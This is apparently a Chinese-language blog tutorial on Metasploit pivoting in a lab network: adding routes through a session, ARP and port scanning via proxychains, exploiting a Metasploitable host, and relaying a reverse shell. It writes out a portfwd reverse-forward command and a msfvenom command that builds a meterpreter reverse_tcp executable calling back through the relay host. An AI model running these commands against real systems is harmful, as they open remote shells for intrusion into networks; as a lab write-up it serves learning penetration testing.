赞
踩
本篇文章主要是关于msf框架的实战内容,主要是关于代理,中继的内容的
网络拓扑图如下
根据网络拓扑,目标公司公网上暴露着一台服务器,然后内部还有两台服务器,但是不能出网,也无法直接访问到,防火墙对于进站规则限制严格,仅允许访问80,443端口,对于A服务器的出站不做限制。
以下的实验是基于这种前提:我们已经拿下了服务器的权限,并且成功反弹shell的情况下,将实验msf在以下三种跨网段的使用
添加路由 ,适用于初始的跨网段代理
端口转发,适用于访问特定目标的代理
反向中继, 需要通过特定的服务器才能反射出来。
首先我们可以通过ifconfig之类的命令以及其他模块得知服务器拥有两块网卡,可以访问两个网段,我们首先可以使用主机发现的模块对两个网段中的存活主机进行探测
post/windows/gather/arp_scanner 可以跨网段使用的arp ,设置session ,这里的254和255两个IP应该是因为虚拟环境的原因才存在的,
然后添加路由,这样msf框架中的模块就可以直接访问到之前访问不到的地址了,最后一个值是sessions ID
192.168.74.133和192.168.74.141是我们计划攻击的主机,在完成主机探测之后,进行端口存活探测。可以使用tcp的端口扫描模块来进行扫描。
也可以设置socket 代理结合proxychains使用msf的外部攻击进行探测。
修改proxychains的配置 配置文件位置 /etc/proxychains.conf, 其中的端口要与msf 中的模块的端口设置相同
使用proxychains代理nmap 进行扫描。
使用攻击模块,直接获取192.168.220.133的shell,这个metasploit的靶机,所以很简单
可以看到他是通过session的隧道生成的新的session
我们让服务器C反向链接攻击机,但是由于服务器C 无法直接访问攻击机,所以需要通过服务器A进行中继
首先攻击机设置handler监听,这里监听的是5555端口
在session1 中设置端口转发
portfwd -R -L 192.168.220.129 -l 5555 -p 6666
生成对应的木马
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.74.140 LPORT=6666 -f exe -o /root/22.exe
运行木马可以成功让机器上线
参考
https://medium.com/axon-technologies/how-to-implement-pivoting-and-relaying-techniques-using-meterpreter-b6f5ec666795
Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。